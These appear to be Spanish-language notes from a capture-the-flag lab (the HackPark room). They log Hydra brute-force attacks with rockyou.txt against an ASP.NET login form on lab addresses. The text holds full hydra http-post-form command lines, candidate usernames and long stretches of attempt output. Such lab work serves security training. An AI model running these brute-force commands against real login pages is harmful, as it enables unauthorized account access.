[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "christian" - 118 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "121212" - 119 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sayang" - 120 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "america" - 121 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "dancer" - 122 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "monica" - 123 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "richard" - 124 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "112233" - 125 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "princess1" - 126 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "555555" - 127 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "diamond" - 128 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "carolina" - 129 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "steven" - 130 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rangers" - 131 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "louise" - 132 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "orange" - 133 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "789456" - 134 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "999999" - 135 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "shorty" - 136 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "11111" - 137 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "nathan" - 138 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "snoopy" - 139 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "gabriel" - 140 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "hunter" - 141 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cherry" - 142 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "killer" - 143 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sandra" - 144 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alejandro" - 145 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "buster" - 146 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "george" - 147 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "brittany" - 148 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alejandra" - 149 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "patricia" - 150 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rachel" - 151 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "tequiero" - 152 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "7777777" - 153 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cheese" - 154 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "159753" - 155 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "arsenal" - 156 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "dolphin" - 157 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "antonio" - 158 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "heather" - 159 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "david" - 160 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "ginger" - 161 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "stephanie" - 162 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "peanut" - 163 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "blink182" - 164 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "sweetie" - 165 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "222222" - 166 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "beauty" - 167 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "987654" - 168 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "victoria" - 169 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "honey" - 170 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "00000" - 171 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "fernando" - 172 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "pokemon" - 173 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "maggie" - 174 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "corazon" - 175 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "chicken" - 176 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "pepper" - 177 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "cristina" - 178 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rainbow" - 179 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "kisses" - 180 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "manuel" - 181 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "myspace" - 182 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "rebelde" - 183 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "angel1" - 184 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "ricardo" - 185 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "babygurl" - 186 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "heaven" - 187 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "55555" - 188 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "baseball" - 189 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "martin" - 190 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "greenday" - 191 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "november" - 192 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "alyssa" - 193 of 14344399 [child 0] (0/0)
......................
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "CUTIEPIE" - 20878 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "BABY123" - 20879 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "<div><embed src=\\" - 20880 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "999000" - 20881 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "7seven" - 20882 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "7779311" - 20883 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "666888" - 20884 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "5678910" - 20885 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "3p1c1zzle" - 20886 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "300889" - 20887 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "2sisters" - 20888 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "260688" - 20889 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "251191" - 20890 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "250987" - 20891 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "250590" - 20892 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "241289" - 20893 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "231091" - 20894 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.174.239 - login "penywise" - pass "221087" - 20895 of 14344399 [child 11] (0/0)
[80][http-post-form] host: 10.10.174.239 login: penywise password: <div><embed src=\\
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-25 01:38:03
BIEN AL LOGUEARNOS CON penywise:<div><embed NOS MUESTRA LO SIGUIENTE EN LA PAGINA :
hackpark
¡Ups! Ha ocurrido un error inesperado.
¡Esto depende de mí! Acepte mis disculpas por esto. Me encargaré de que el desarrollador responsable de que esto suceda reciba 20 latigazos (pero solo después de que haya solucionado este problema).
INICIO
ARCHIVO
CONTACTARNOS
INICIAR SESIÓN
NO ERA EL USUARIO APARENTEMENETE
BUSCANDO INFORMACIOND E ACTORES DE LKA PELICULA COMO POSIBLES USUARIOS PARA APLICAR HYDRA:
********
Anderson
Visitor1
Jonathan
Stephenk
hackpark
Anderson
Kaspbrak
penywise
adminwis
admintim
admin123
Hanscom
Brandon
Stephen
Brandis
Annette
Richard
Visitante1
administrator
ssh root@10.10.125.241
hydra -l Visitor1 -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=^VIEWSTATE^&__EVENTVALIDATION=^EVENTVALIDATION^&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n:Login failed"
/Account/login.aspx?ReturnURL=/admin/
hydra -l admin123 -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed"
SEGUNDAS PRUUEBAS:
hydra -l admin123 -P /usr/share/wordlists/rockyou.txt 10.10.118.10 -V http-post-form "/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00$MainContent$LoginUser$UserName=^USER^&ctl00$MainContent$LoginUser$Password=^PASS^&ctl00$MainContent$LoginUser$LoginButton=Iniciar+sesi%C3%B3n&Login=Login:Login
failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 -V http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n&Login=Login:Login
failed"
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 -V http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n&Login=Login:Login
failed"
hydra -l admin123 -P /usr/share/wordlists/rockyou.txt 10.10.174.239 -V http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=dafpnMH9%2B6gv3LceL517447DIxmcC8ATtGxFhL93mAkZEoPPlRJ20nNhMZKFERhcbAMatYsNIivOlT2%2FX3AYWMhPH4fCes1Oc15Sm7t6YyWSQnD8MV0PyjP4k6HvglMK77kUSSi1Yhmn7mSF84IYEbW02BFi1AR3AmDEzU0zkzDgiVMP&__EVENTVALIDATION=Tjy94c85ufC73iZyte%2FPDZ1wB3D%2FbqLg4CRmlxqrVc5R4hj36C5Bb7B7hxN%2BwoqOKdG3MY4wFOYEKmxK0llq5tR%2BfoH%2FaDZaCmLcetK3p2WcZilb1WhcAvapfCdSVZuwjR6GqkST3kB0jOBMUmUczpJEPM6FVMz6GprsZYk6NNAzXB3t&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Iniciar+sesi%C3%B3n:Login failed"
--------------------
ESTE COMANDO FUNCIONO, CAMBIAMOS FORZADAMENTE AL IDIOMA INGLES AL FORMULARIO DE LOGIN; CAPTURAMOS CON BURPSUITE LA REQUEST QUE SE ENVIA POR POST AL SERVIDOR Y CARGAMOS EL COMAN LINE DE HYDRA CON ESA SOLICITUD TAL CUAL; AGREGANDO LOS COMODINES DE USER y PASS Y AL FINAL : LOGIN FAILED PARA QUE IDENTIFIQUE CUANDO ALLA UNA RESPUESTA CORRECTA, Y FUNCIONO ESTE:
TERCER PRUEBAS:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=yMdTectXM180sGrMQRYRPem1MJwWGFuXuPKA9l%2BBCclkFuO%2BxH3KYmLqPnHDjg4mJPQ1jWnOkbDybhszy4T9h2fN1w%2FNe5mG896wrHe8BX8WzBCsiSvtf1C0rJ8N%2FhouRYA4NqPL%2BsIqZOFMN%2BXbpoUW%2Fk9cGWAHd%2FnenUzXkzXBmbc0X%2BZBcYdHl9OdlT9z1yV4TQkbM8RFyIpDfxRVG1nW1dcci0hpEe3A99MaczpR8ndT8UJ4S1bZe9h0ej7VwDiX0HAcRsqUhEL1KzhUNhHsOl3fJrU5F2iGHqREd6V69NkLvXGB49A70NSzmKQAb70Gv0d3147LXKP7evBebBLGmc%2FNJytU2QhAW%2FGD02pvBdzY&__EVENTVALIDATION=bi37l8LK6qtoJBEMdZxChvQ2dCz7R%2BhtOVWqrwONeRLD6Ig6ySpQAUn5neJ21KiutOHYBBcOrUeYcdW5HCOQgO5MJYEszT7n8IlZDqxI8jeKYYnMl2v75kd%2FVSVZ7MousVLHhX%2BB6HgBps2D%2B1HO3OJJwwEu5WoD1C9amzvn%2F4la9uHF&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V
CONSEGUIMOS LA CONTRASEÑA DE ADMIN:
┌──(root㉿kali)-[~]
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.118.10 http-post-form "/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=yMdTectXM180sGrMQRYRPem1MJwWGFuXuPKA9l%2BBCclkFuO%2BxH3KYmLqPnHDjg4mJPQ1jWnOkbDybhszy4T9h2fN1w%2FNe5mG896wrHe8BX8WzBCsiSvtf1C0rJ8N%2FhouRYA4NqPL%2BsIqZOFMN%2BXbpoUW%2Fk9cGWAHd%2FnenUzXkzXBmbc0X%2BZBcYdHl9OdlT9z1yV4TQkbM8RFyIpDfxRVG1nW1dcci0hpEe3A99MaczpR8ndT8UJ4S1bZe9h0ej7VwDiX0HAcRsqUhEL1KzhUNhHsOl3fJrU5F2iGHqREd6V69NkLvXGB49A70NSzmKQAb70Gv0d3147LXKP7evBebBLGmc%2FNJytU2QhAW%2FGD02pvBdzY&__EVENTVALIDATION=bi37l8LK6qtoJBEMdZxChvQ2dCz7R%2BhtOVWqrwONeRLD6Ig6ySpQAUn5neJ21KiutOHYBBcOrUeYcdW5HCOQgO5MJYEszT7n8IlZDqxI8jeKYYnMl2v75kd%2FVSVZ7MousVLHhX%2BB6HgBps2D%2B1HO3OJJwwEu5WoD1C9amzvn%2F4la9uHF&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -V
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-26 00:33:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.118.10:80/Account/login.aspx?ReturnURL=%2fADMIN:__VIEWSTATE=yMdTectXM180sGrMQRYRPem1MJwWGFuXuPKA9l%2BBCclkFuO%2BxH3KYmLqPnHDjg4mJPQ1jWnOkbDybhszy4T9h2fN1w%2FNe5mG896wrHe8BX8WzBCsiSvtf1C0rJ8N%2FhouRYA4NqPL%2BsIqZOFMN%2BXbpoUW%2Fk9cGWAHd%2FnenUzXkzXBmbc0X%2BZBcYdHl9OdlT9z1yV4TQkbM8RFyIpDfxRVG1nW1dcci0hpEe3A99MaczpR8ndT8UJ4S1bZe9h0ej7VwDiX0HAcRsqUhEL1KzhUNhHsOl3fJrU5F2iGHqREd6V69NkLvXGB49A70NSzmKQAb70Gv0d3147LXKP7evBebBLGmc%2FNJytU2QhAW%2FGD02pvBdzY&__EVENTVALIDATION=bi37l8LK6qtoJBEMdZxChvQ2dCz7R%2BhtOVWqrwONeRLD6Ig6ySpQAUn5neJ21KiutOHYBBcOrUeYcdW5HCOQgO5MJYEszT7n8IlZDqxI8jeKYYnMl2v75kd%2FVSVZ7MousVLHhX%2BB6HgBps2D%2B1HO3OJJwwEu5WoD1C9amzvn%2F4la9uHF&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "654321" - 17 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "michael" - 18 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "ashley" - 19 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "qwerty" - 20 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "111111" - 21 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "iloveu" - 22 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "000000" - 23 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "michelle" - 24 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "tigger" - 25 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "sunshine" - 26 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "chocolate" - 27 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "password1" - 28 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "soccer" - 29 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "anthony" - 30 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "friends" - 31 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "butterfly" - 32 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "purple" - 33 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "angel" - 34 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "jordan" - 35 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "liverpool" - 36 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "justin" - 37 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "loveme" - 38 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "fuckyou" - 39 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "123123" - 40 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "football" - 41 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "secret" - 42 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "andrea" - 43 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "carlos" - 44 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "jennifer" - 45 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "joshua" - 46 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "bubbles" - 47 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "1234567890" - 48 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "superman" - 49 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "hannah" - 50 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "amanda" - 51 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "loveyou" - 52 of 14344399 [child 13] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "pretty" - 53 of 14344399 [child 1] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "basketball" - 54 of 14344399 [child 3] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "andrew" - 55 of 14344399 [child 4] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "angels" - 56 of 14344399 [child 5] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "tweety" - 57 of 14344399 [child 6] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "flower" - 58 of 14344399 [child 7] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "playboy" - 59 of 14344399 [child 8] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "hello" - 60 of 14344399 [child 9] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "elizabeth" - 61 of 14344399 [child 10] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "hottie" - 62 of 14344399 [child 12] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "tinkerbell" - 63 of 14344399 [child 14] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "charlie" - 64 of 14344399 [child 15] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "samantha" - 65 of 14344399 [child 0] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "barbie" - 66 of 14344399 [child 11] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "chelsea" - 67 of 14344399 [child 2] (0/0)
[ATTEMPT] target 10.10.118.10 - login "admin" - pass "lovers" - 68 of 14344399 [child 13] (0/0)
